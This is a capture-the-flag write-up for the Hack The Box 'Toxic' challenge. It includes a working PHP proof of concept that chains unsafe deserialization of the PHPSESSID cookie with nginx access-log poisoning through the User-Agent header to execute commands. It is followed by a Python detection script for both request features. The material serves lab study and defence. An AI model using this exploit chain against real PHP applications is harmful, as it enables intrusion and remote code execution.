https://app.hackthebox.com/challenges/224

Description

Humanity has exploited our allies, the dart frogs, for far too long; take back the freedom of our lovely poisonous friends. Malicious input is out of the question when dart frogs meet industrialisation. 🐸

Exploitation

```php
<?php
// PoC: the application unserializes the PHPSESSID cookie without validation,
// and the resulting object's file path is included; the nginx access log is
// poisoned through the User-Agent header so that inclusion executes PHP.
if ($argc < 3) {
    echo "Usage: php poc <url> <path>\n";
    exit(1);
}

// Mirrors the application's PageModel class: the only property needed is the
// path of the file that gets included.
class PageModel
{
    public $file;
    public function __construct($file)
    {
        $this->file = $file;
    }
}

$url = $argv[1];
$file_path = $argv[2];

// Serialize a PageModel pointing at the chosen path and hand it over as the
// session cookie, exactly as the application expects to unserialize it.
$page_model = new PageModel($file_path);
$payload = base64_encode(serialize($page_model));

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    "Cookie: PHPSESSID=$payload",
    // nginx writes the User-Agent verbatim into access.log; when that log is
    // the included file, the PHP tag below is executed.
    "User-Agent: <?php system('ls /'); ?>"
]);
$response = curl_exec($ch);
curl_close($ch);
echo "Response:\n$response\n";
```
Usage:

```
php poc <url> <path>
```

Paths used in this writeup (the first is the access log poisoned via the User-Agent header, the second is the flag file):

```
/var/log/nginx/access.log
/flag_Xapdy
```
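As an added defensive counterpart, not part of the writeup or the challenge, the following Python flags the two request features the PoC depends on: a PHPSESSID cookie that base64-decodes to a PHP serialized object, and a User-Agent carrying a PHP open tag, checked both on live request headers (WAF or middleware hook) and on nginx combined-format access-log lines. The regexes, header samples and log lines are constructed for illustration.

```python
import base64
import binascii
import re

# Added detection heuristics (not from the writeup): flag the two request features
# the PoC relies on, for a WAF/middleware hook or for access-log review.
PHP_OBJECT_RE = re.compile(rb'^O:\d+:"[A-Za-z_\\][\w\\]*":\d+:\{')
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)', re.IGNORECASE)
LOG_UA_RE = re.compile(r'"([^"]*)"\s*$')  # last quoted field of an nginx combined line

def cookie_value(cookie_header, name):
    """Return the value of cookie `name` from a raw Cookie header, or None."""
    for part in cookie_header.split(';'):
        key, _, value = part.strip().partition('=')
        if key == name:
            return value
    return None

def sessid_is_serialized_object(value):
    """True if the cookie base64-decodes to a PHP serialized object, O:n:"Class":..."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return PHP_OBJECT_RE.match(raw) is not None

def inspect_request(headers):
    """Return findings for one request's headers (empty list if nothing suspicious)."""
    findings = []
    if PHP_TAG_RE.search(headers.get('User-Agent', '')):
        findings.append('php-tag-in-user-agent')
    sid = cookie_value(headers.get('Cookie', ''), 'PHPSESSID')
    if sid is not None and sessid_is_serialized_object(sid):
        findings.append('serialized-object-in-phpsessid')
    return findings

def poisoned_log_lines(lines):
    """Return access-log lines whose User-Agent field carries a PHP open tag."""
    return [l for l in lines if (m := LOG_UA_RE.search(l)) and PHP_TAG_RE.search(m.group(1))]

# Constructed samples; the cookie mirrors what the PoC builds for the access-log path.
ATTACK_COOKIE = base64.b64encode(
    b'O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}').decode()
ATTACK_HEADERS = {'Cookie': 'PHPSESSID=' + ATTACK_COOKIE, 'User-Agent': "<?php system('ls /'); ?>"}
BENIGN_HEADERS = {'Cookie': 'PHPSESSID=k3j4h5g6f7d8s9a0q1w2e3r4t5y6u7i8', 'User-Agent': 'Mozilla/5.0'}
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system(\'ls /\'); ?>"',
]
```

A real session id never decodes to an `O:` object record, so the cookie check has a very low false-positive rate; the User-Agent check is the signal to alert on before the log is ever included.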

Summary

Toxic: abuse unsafe deserialization of the PHPSESSID cookie, chained with nginx access-log poisoning through the User-Agent header, to cross the trust boundary and reach the flag.